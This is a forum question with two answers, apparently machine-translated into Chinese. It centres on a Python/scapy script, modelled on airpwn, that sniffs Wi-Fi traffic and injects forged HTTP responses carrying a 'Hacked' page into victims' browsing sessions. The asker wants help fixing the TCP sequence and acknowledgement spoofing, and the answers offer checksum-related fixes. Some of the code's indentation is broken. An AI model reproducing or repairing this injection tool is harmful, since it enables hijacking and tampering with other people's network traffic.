Question

我使用python-scapy创建类似airpwn的程序。现在，我可以嗅探它并伪造802.11数据包，具体任何欺骗所需的值并将其发送到受害者机器，但它不起作用。我想因为我在计算恶搞行数时错了。请告诉我如何重新计算确认号码或我想念的内容。

#!/usr/bin/env python

from scapy.all import *
from scapy.error import Scapy_Exception
import os
import HTTP
##### Start promicuous mode with airmon-ng start wlan0 11 (airmon-ng start/stop interface channel)
tmp=os.popen("iwconfig 2>&1 | grep ESSID | awk '{print $1}' | grep wlan | grep -v mon")
wlan=tmp.read()
wlan=wlan.rstrip('\n')
m_iface="mon0"
#spoof_response=rdpcap("response.cap")

def pktTCP(pkt):
    if pkt.haslayer(TCP):
        if HTTP.HTTPRequest or HTTP.HTTPResponse in pkt:
            src=pkt[IP].src
            srcport=pkt[IP].sport
            dst=pkt[IP].dst
            dstport=pkt[IP].dport
            test=pkt[TCP].payload
            if (HTTP.HTTPRequest in pkt):
                print "HTTP Request:"
                print "======================================================================"
                print ("Src: ",src," Sport: ",srcport," Dst: ",dst," Dport: ",dstport," Hostname: ",test.Host)
                print ("Seq: ",str(pkt[TCP].seq)," | Ack: ",str(pkt[TCP].ack))
                print ("Wireless: ",wlan)

                dot11_frame = RadioTap()/Dot11(
                    type = "Data",
                    FCfield = "from-DS",
                    addr1 = pkt[Dot11].addr2,
                    addr2 = pkt[Dot11].addr1,
                    addr3 = pkt[Dot11].addr1,
                    )

                #### Spoof HTTP Response
                                day=time.strftime("%a, %d %Y %T GMT+7")
                                #print day
                                spoof_Page="<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\"><html><head><title>Hacked</title></head><body><p>Hacked By Sumedt</font></p></body></html>"
                len_of_page=len(spoof_Page)
                spoof_HTTP_Response_Header="HTTP/1.1 200 OK\x0d\x0aDate: "+day+"\x0d\x0aContent-Type: text/html; charset=UTF-8\x0d\x0aContent-Length: "+str(len_of_page)+"\x0d\x0a\x0d\x0a"
                                Spoof_Payload=spoof_HTTP_Response_Header+spoof_Page


                #### Crafing HTTP Response Packet
                spoof_response=dot11_frame/LLC(ctrl=3)/SNAP()/IP()/TCP()/Spoof_Payload
                #### Spoof IP
                spoof_response.dst=pkt[IP].src
                spoof_response.src=pkt[IP].dst
                spoof_response.ttl=pkt[IP].ttl
                #### Spoof TCP
                spoof_response.sport=pkt[TCP].dport
                spoof_response.dport=pkt[TCP].sport
                spoof_response.window=dport=pkt[TCP].window
                spoof_response.seq=pkt[TCP].ack

                ### Recalculate chksum and ack              
                spoof_response.ack=(pkt[TCP].seq + len(Spoof_Payload)) & 0xffffffff
                del spoof_response.chksum
                ### For recalculate chksum
                spoof_response = spoof_response.__class__(str(spoof_response))

                print "Finish specific value"
                #spoof_response.show()
                sendp(spoof_response)

print "Start Sniffing"
sniff(iface=m_iface,prn=pktTCP)

Answer 1

如果更改有效负载的内容，则还应更改MAC头和TCP头中的校验和。否则，数据包将被视为错误的数据包并自动丢弃。

Answer 2

删除spoof_response.chksum后，我认为您重新初始化该变量。

像

spoof_response.chksum = spoof_response.__class__(str(spoof_response))

使用scapy在无线局域网中创建欺骗性HTTP响应

2 个答案: